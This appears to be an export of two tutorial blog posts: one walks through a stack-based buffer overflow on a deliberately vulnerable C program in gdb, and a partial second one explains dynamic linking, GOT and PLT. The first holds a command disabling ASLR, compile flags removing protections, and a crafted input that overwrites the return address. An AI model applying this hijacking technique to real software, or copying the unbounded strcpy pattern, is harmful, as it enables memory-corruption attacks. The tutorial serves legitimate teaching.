[{"content":"Setting the Stage Today, we’re not just smashing buffers — we’re hijacking control flow with user input. Before we start our little \u0026ldquo;experiment,\u0026rdquo; let\u0026rsquo;s make sure the playground is\u0026hellip; accommodating. (Optional)\nASLR? 1 - That pesky troublemaker has to go.\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space Now the memory layout won’t jump around like a caffeinated squirrel. Let’s roll. 😏\nThe Vulnerable Program Here\u0026rsquo;s a simple CTF-style challenge: vuln.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; void secret_function() { printf(\u0026#34;You\u0026#39;ve called the secret function!\\n\u0026#34;); } void vulnerable_function(char *input) { char buffer[5]; strcpy(buffer, input); // Whoops, no bounds check! } int main(int argc, char **argv) { if (argc != 2) { printf(\u0026#34;Usage: %s \u0026lt;input\u0026gt;\\n\u0026#34;, argv[0]); return 1; } vulnerable_function(argv[1]); printf(\u0026#34;Done processing input.\\n\u0026#34;); return 0; } Compiling Without Protections Now we\u0026rsquo;ll compile this code into a machine readable format: elf.\nTo keep things\u0026hellip; delightfully fragile..\ngcc -o vuln vuln.c -fno-stack-protector -z execstack Delightfully fragile? (\u0026hellip;Why These Flags?) -fno-stack-protector: Removes the stack canary 2.\n-z execstack: Marks the stack as executable.\nBecause why not make life easier (for learning purposes only)!!\nSo… what the heck actually happens when I run this thing? Okay, quick version: when you run an ELF binary, Linux kicks things off with a system call to: int execve(const char *filename, char *const argv[], char *const envp[]) 3\u0026hellip;\n# strace ./vuln execve(\u0026#34;./vuln\u0026#34;, [\u0026#34;./vuln\u0026#34;], 0x7ffcd96818c0 /* 22 vars */) = 0 ... ... 
This call then passes the baton to another internal kernel function: static int load_elf_binary(struct linux_binprm *bprm) 4 5\nAnd just like that, Linux begins laying out the stage for your binary. The loader steps in, quietly pulling strings to bring ./vuln to life\u0026hellip;\nOnce execve is called, the kernel does the heavy lifting — it sets the scene, maps the memory, initializes the stack, and finally, passes control to the entrypoint of your program. A clean slate, ready for action.\n# readelf --file-header ./vuln ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1070 \u0026lt;-- [ THIS THING HERE ] Start of program headers: 64 (bytes into file) Start of section headers: 13736 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 14 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 Wanna see where the magic begins? Hit the binary with objdump and look for the entry point.\n# objdump -d ./vuln | grep 1070 0000000000001070 \u0026lt;_start\u0026gt;: Ah, but don’t be fooled — that’s not your main() flexing. What you’re seeing here is the true beginning: _start, the entry summoned by the linker/loader.\nIt\u0026rsquo;s the setup squad — the one that gets everything ready before your actual code runs.\nSo what’s the deal with this detour?\nWell, _start is the one pulling strings behind the scenes — it\u0026rsquo;s provided by the C runtime, and it sets up the whole environment. Only after that does it call your main() function, passing in argc, argv, and envp all nice and proper.\nAlright then, let\u0026rsquo;s start up gdb. 
You already know where to place the breakpoint — right where it matters (main function obviously). Once it hits, the rest of the experiment is yours to unfold. Simple, right?\ngdb\u0026gt; break main gdb\u0026gt; run gdb\u0026gt; print $rip $1 = (void (*)()) 0x555555555195 \u0026lt;main+4\u0026gt; gdb\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555191 \u0026lt;+0\u0026gt;: push rbp 0x0000555555555192 \u0026lt;+1\u0026gt;: mov rbp,rsp =\u0026gt; 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10 0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi 0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; 0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 0x00005555555551bf \u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; 0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax 0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; 0x00005555555551de \u0026lt;+77\u0026gt;: lea rax,[rip+0xe59] # 0x55555555603e 0x00005555555551e5 \u0026lt;+84\u0026gt;: mov rdi,rax 0x00005555555551e8 \u0026lt;+87\u0026gt;: call 0x555555555040 
\u0026lt;puts@plt\u0026gt; 0x00005555555551ed \u0026lt;+92\u0026gt;: mov eax,0x0 0x00005555555551f2 \u0026lt;+97\u0026gt;: leave 0x00005555555551f3 \u0026lt;+98\u0026gt;: ret End of assembler dump. Let\u0026rsquo;s take a look at how the compiler really interprets what we write in C — the transformation from human-readable logic to cold, deterministic machine dance.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 // 0x0000555555555191 \u0026lt;+0\u0026gt;: push rbp // 0x0000555555555192 \u0026lt;+1\u0026gt;: mov rbp,rsp // 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10 // 0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi // 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi int main(int argc, char **argv) { // 0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 // 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; if (argc != 2) { // 0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] // 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] // 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax // 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b // 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax // 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 // 0x00005555555551bf \u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; printf(\u0026#34;Usage: %s \u0026lt;input\u0026gt;\\n\u0026#34;, argv[0]); // 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 // 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; return 1; } // 0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] // 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 // 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] // 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax // 
0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; vulnerable_function(argv[1]); // 0x00005555555551de \u0026lt;+77\u0026gt;: lea rax,[rip+0xe59] # 0x55555555603e // 0x00005555555551e5 \u0026lt;+84\u0026gt;: mov rdi,rax // 0x00005555555551e8 \u0026lt;+87\u0026gt;: call 0x555555555040 \u0026lt;puts@plt\u0026gt; printf(\u0026#34;Done processing input.\\n\u0026#34;); // 0x00005555555551ed \u0026lt;+92\u0026gt;: mov eax,0x0 return 0; // 0x00005555555551f2 \u0026lt;+97\u0026gt;: leave // 0x00005555555551f3 \u0026lt;+98\u0026gt;: ret } Line number 3 \u0026ndash;\u0026gt; 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10\nThis instruction creates space on the stack for local variables used inside the main function. It moves the stack pointer down by 0x10 (16 bytes), effectively reserving that much space between rbp and rsp.\nThis reserved stack space is where local variables will live — think of it as the function’s personal scratchpad. In this case, since we compiled without optimization, the compiler saves the incoming function arguments argc (in edi) and argv (in rsi) into this space:\n0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi The next few lines perform a sanity check: Is the correct number of arguments passed to the program?\n0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; If argc is not exactly 2 (the program name plus one argument), we take the failure route:\n0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 0x00005555555551bf 
\u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; Otherwise — if the argument count is valid — we jump ahead and continue with the actual work \u0026ndash; calling vulnerable_function\n0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax 0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; Calling vulnerable_function Let’s drop another breakpoint — this time on vulnerable_function. Why? Because vibes. And also, it’s kinda important.\ngdb\u0026gt; break *vulnerable_function Since the \u0026ldquo;sanity check\u0026rdquo; (argc == 2) needs to pass for the program to proceed into vulnerable_function, we have to supply exactly one argument besides the program name.\nSo yeah, we re-run the program with \u0026ldquo;abc\u0026rdquo; as the user input:\ngdb\u0026gt; run abc And this is what the disassembly of vulnerable_function looks like:\ngdb\u0026gt; disas vulnerable_function Dump of assembler code for function vulnerable_function: =\u0026gt; 0x000055555555516f \u0026lt;+0\u0026gt;: push rbp 0x0000555555555170 \u0026lt;+1\u0026gt;: mov rbp,rsp 0x0000555555555173 \u0026lt;+4\u0026gt;: sub rsp,0x20 0x0000555555555177 \u0026lt;+8\u0026gt;: mov QWORD PTR [rbp-0x18],rdi 0x000055555555517b \u0026lt;+12\u0026gt;: mov rdx,QWORD PTR [rbp-0x18] 0x000055555555517f \u0026lt;+16\u0026gt;: lea rax,[rbp-0x5] 0x0000555555555183 \u0026lt;+20\u0026gt;: mov rsi,rdx 0x0000555555555186 \u0026lt;+23\u0026gt;: mov rdi,rax 0x0000555555555189 \u0026lt;+26\u0026gt;: call 0x555555555030 \u0026lt;strcpy@plt\u0026gt; 0x000055555555518e \u0026lt;+31\u0026gt;: nop 0x000055555555518f \u0026lt;+32\u0026gt;: leave 
0x0000555555555190 \u0026lt;+33\u0026gt;: ret End of assembler dump. This is what the stack looks like before and after rbp is pushed.\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8f8: 0x00005555555551de 0x00007fffffffea38 0x7fffffffe908: 0x00000002ffffea38 0x00007fffffffe9b0 0x7fffffffe918: 0x00007ffff7deb488 0x00007fffffffe960 0x7fffffffe928: 0x00007fffffffea38 0x0000000255554040 0x7fffffffe938: 0x0000555555555191 0x00007fffffffea38 0x7fffffffe948: 0x03061a2375dd9875 0x0000000000000002 0x7fffffffe958: 0x0000000000000000 0x00007ffff7ffd000 0x7fffffffe968: 0x0000555555557dd8 0x03061a2374fd9875 0x7fffffffe978: 0x03060a61cec39875 0x00007fff00000000 0x7fffffffe988: 0x0000000000000000 0x0000000000000000 gdb\u0026gt; x/20gx $rsp 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0x03061a2375dd9875 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 0x7fffffffe970: 0x03061a2374fd9875 0x03060a61cec39875 0x7fffffffe980: 0x00007fff00000000 0x0000000000000000 At the start of the function, we push the old rbp onto the stack — that\u0026rsquo;s our link to the previous stack frame. The new top of the stack (0x7fffffffe8f0) now holds the old base pointer, 0x00007fffffffe910, and right above it sits the return address into main (0x00005555555551de).\nRight after that, the function reserves space with sub rsp,0x20. 
That’s 32 bytes of fresh stack space, prepped and ready for locals, temps, maybe even your buffer that’s about to get overflowed (👀).\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0x03061a2375dd9875 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 The next instruction, mov QWORD PTR [rbp-0x18],rdi, saves the pointer to the passed argument (argv[1]) in the stack slot at rbp-0x18 (0x7fffffffe8d8). The stack now looks like this:\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece8 0x7fffffffe8e0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xc52f50aa6574d516 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 # Verification gdb\u0026gt; x/s 0x00007fffffffece8 0x7fffffffece8: \u0026#34;abc\u0026#34; Now strcpy takes this pointer and copies the bytes it points to, including the terminating null byte, into the destination buffer at rbp-0x5. At this point, the actual content of argv[1] is sitting on the stack, right there in that buffer. 
Depending on the length, it might look like a perfect fit…\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece8 0x7fffffffe8e0: 0x0000000000000000 0x0000636261000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xc52f50aa6574d516 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 # Verification gdb\u0026gt; x/s $rbp-0x5 0x7fffffffe8eb: \u0026#34;abc\u0026#34; What if we pass a bigger string? gdb\u0026gt; run abcdef Doing the same thing, but with a string big enough to overflow the buffer. The buffer holds 5 bytes and strcpy also writes the terminating null byte, so any input of 5 or more characters spills past it.\nAnd now\u0026hellip; here’s the stack, post-overflow. This is the moment where structure gives way to chaos.\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece5 0x7fffffffe8e0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8f0: 0x00007fffffff0066 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xad2578063243f742 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 gdb\u0026gt; x/s $rbp-0x5 0x7fffffffe8eb: \u0026#34;abcdef\u0026#34; See how easily it changed the saved rbp value from 0x00007fffffffe910 to 0x00007fffffff0066.\n0x66 is ASCII for \u0026lsquo;f\u0026rsquo; and 0x00 is the null terminator; together they overwrite the two lowest bytes of the saved rbp. The first 5 characters (abcde) sit in the buffer itself.\nWhen vulnerable_function returns, its leave instruction pops this corrupted value into rbp, so rbp now points to 0x00007fffffff0066. 
This becomes the new anchor for any variable access — everything’s calculated relative to this updated rbp.\ngdb\u0026gt; info frame Stack level 0, frame at 0x7fffffff0076: rip = 0x5555555551de in main; saved rip = 0x0 called by frame at 0x7fffffff007e Arglist at 0x7fffffff0066, args: Locals at 0x7fffffff0066, Previous frame\u0026#39;s sp is 0x7fffffff0076 Saved registers: rbp at 0x7fffffff0066, rip at 0x7fffffff006e Now let\u0026rsquo;s take even bigger string that overwrites more of this unprotected memory\u0026hellip;\ngdb\u0026gt; run abcdefghijklmnopqrstuvwxyz Cut to: the aftermath\n# Before strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd1 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x00007fffffffe900 0x00005555555551de 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x0f6d273242269d28 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 # After strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd1 0x7fffffffe8d0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8e0: 0x6d6c6b6a69686766 0x7574737271706f6e 0x7fffffffe8f0: 0x0000007a79787776 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x0f6d273242269d28 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 a classic stack overflow — and not just any overflow, but a textbook rip overwrite. 
Let\u0026rsquo;s break it down like an autopsy:\nThe saved return address now holds 0x7574737271706f6e, which is just the input bytes \u0026#34;nopqrstu\u0026#34; read as a little-endian value. When vulnerable_function returns, the program tries to continue from that address, cannot access it, and dies with a segmentation fault!\ngdb\u0026gt; x $rip 0x7574737271706f6e: Cannot access memory at address 0x7574737271706f6e This brings us to the secret_function in the vuln.c program\u0026hellip;\ngdb\u0026gt; disas secret_function Dump of assembler code for function secret_function: 0x0000555555555159 \u0026lt;+0\u0026gt;: push rbp 0x000055555555515a \u0026lt;+1\u0026gt;: mov rbp,rsp 0x000055555555515d \u0026lt;+4\u0026gt;: lea rax,[rip+0xea4] # 0x555555556008 0x0000555555555164 \u0026lt;+11\u0026gt;: mov rdi,rax 0x0000555555555167 \u0026lt;+14\u0026gt;: call 0x555555555040 \u0026lt;puts@plt\u0026gt; 0x000055555555516c \u0026lt;+19\u0026gt;: nop 0x000055555555516d \u0026lt;+20\u0026gt;: pop rbp 0x000055555555516e \u0026lt;+21\u0026gt;: ret End of assembler dump. Now imagine this: what if we shape our input just right… so that when vulnerable_function returns, it hands control not back to where it came from — but straight to 0x0000555555555159 (secret_function)?\n## abcde12341234YQUUUU ## [\u0026#39;a\u0026#39;, \u0026#39;b\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;d\u0026#39;, \u0026#39;e\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;3\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;3\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;0x59\u0026#39;, \u0026#39;0x51\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;] ## remember little-endian?! 
## gdb\u0026gt; run abcde12341234YQUUUU # Before strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd8 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x00007fffffffe900 0x00005555555551de 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x7fe849f3e90b379d 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 # After strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd8 0x7fffffffe8d0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8e0: 0x3433323134333231 0x0000555555555159 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x7fe849f3e90b379d 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 And now, with rip pointing to 0x0000555555555159, the game changes. Even though main never explicitly called secret_function, we’ve bent the rules — and now it runs anyway. Just the way we like it.\ngdb\u0026gt; x/gx $rbp 0x3433323134333231: Cannot access memory at address 0x3433323134333231 gdb\u0026gt; x/gx $rsp 0x7fffffffe8e8: 0x0000555555555159 gdb\u0026gt; x/i 0x0000555555555159 0x555555555159 \u0026lt;secret_function\u0026gt;: push rbp gdb\u0026gt; c Continuing. You\u0026#39;ve called the secret function! Program received signal SIGILL, Illegal instruction. This gets the job done, sure… But man, it leaves the stack looking like a crime scene. 
We’ll clean that up next time.\nhttps://www.networkworld.com/article/966844/what-does-aslr-do-for-linux.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://ctf101.org/binary-exploitation/stack-canaries/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/tools/include/nolibc/sys.h#L286\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/fs/binfmt_elf.c#L825\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/include/linux/binfmts.h#L18\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2025/04/intro-to-re-part-5/","summary":"Setting the Stage Today, we’re not just smashing buffers — we’re hijacking control flow with user input. Before we start our little \u0026ldquo;experiment,\u0026rdquo; let\u0026rsquo;s make sure the playground is\u0026hellip; accommodating. (Optional)\nASLR? 1 - That pesky troublemaker has to go.\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space Now the memory layout won’t jump around like a caffeinated squirrel. Let’s roll. 
😏\nThe Vulnerable Program Here\u0026rsquo;s a simple CTF-style challenge: vuln.c\n#include \u0026lt;stdio.","title":"Intro to RE: C : part-5 [Stack Based Buffer Overflow]"},{"content":"Intro In earlier articles, we talked about various parts of an ELF file and the many steps needed to create an executable ELF file that can run on your computer.\n(Note: The steps are shown visually below; For the source code, check out the symbol table article in this series.)\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ ┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ After completing this process, we have an ELF executable called calc. However, we didn\u0026rsquo;t directly include any library that contains definitions for functions like printf or scanf, which we used in our main.c file to input and output data. So, how does that work?\nAnswer: Dynamic linking (which is a complex topic, so for this article, we\u0026rsquo;ll just cover the basics).\nIf you use the file command on the calc executable, it will display interesting information such as dynamically linked and interpreter /lib64/ld-linux-x86-64.so.2.\n\u0026gt; file calc calc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=65b929ceea26ea5e9fb8df1b15f2ab24b5c43ff6, for GNU/Linux 4.4.0, not stripped Before we move forward, let\u0026rsquo;s discuss some basics about libraries and how Linux manages them. 
Linux supports two types of libraries: static and shared.\nStatic libraries are linked into a program at build time (during the linking phase), while dynamic libraries (also known as shared libraries) are loaded when the application is launched, and all symbol resolutions and bindings are done at runtime.\nDynamic or shared libraries can be handled in two ways: Either you link your program with the shared library and let Linux load the library when the program runs (dynamic linking) 1, or you can design your application so that it loads the library from a specified path and then calls a particular function within that library (dynamic loading). 2\nNow, looking at our calc binary, it\u0026rsquo;s evident that we\u0026rsquo;re using dynamic linking to handle functions like printf and scanf (since we are not explicitly loading any library in our code). If you have any background in C programming, you\u0026rsquo;ve likely heard of the standard C library (libc) at least once. libc contains definitions for many standard functions used by many C programs, including printf and scanf, which we need in our calc executable.\nSo, when we run the calc executable, the dynamic linker figures out which libraries it needs and loads them into the process memory space. Once that\u0026rsquo;s done, it resolves the dynamic symbols that calc refers to.\nUnless the binary asks for immediate binding, function symbols are resolved lazily. This means that a function\u0026rsquo;s address is looked up only the first time that function is actually called. 
This approach is called lazy binding, and it helps speed up the loading of calc itself.\nSince symbol resolution happens at runtime, the address of the resolved symbol needs to be stored somewhere so that we don\u0026rsquo;t have to resolve it every time it\u0026rsquo;s needed.\nGOT (Global Offset Table) and PLT (Procedure Linkage Table) Let\u0026rsquo;s visualize our situation: We need the address of the printf function to make a call, but we don\u0026rsquo;t know where in the process memory space the libc library will load, so we can\u0026rsquo;t determine the exact address for printf.\nHow can we call printf then?\nOne naive method would be to load libc into the process memory space, find the exact address for printf using libc\u0026rsquo;s base address, and then modify the .text section of calc to update the placeholder address of printf with the exact address. This seems straightforward and will work. However, with this approach, code pages that get patched can no longer be shared between processes: each instance of calc (or of any other program patched this way) needs its own private, modified copy. This isn\u0026rsquo;t efficient, because code can only be shared in memory when it is completely read-only and never modified.\nAnother approach is to add a level of redirection to this method. In this newer approach, we patch the .got and/or .got.plt section (which contains the Global Offset Table) of calc. The idea is that when the library is loaded, the dynamic linker examines the relocation, finds the exact address of printf, and patches the .got and/or .got.plt entry as required. Then, the calc binary refers to these tables to point to the right place. This way, everything works seamlessly!\nWhat does the PLT do here?\nThe PLT (Procedure Linkage Table) adds another level of redirection that utilizes the .got.plt section to keep track of function jumps. 
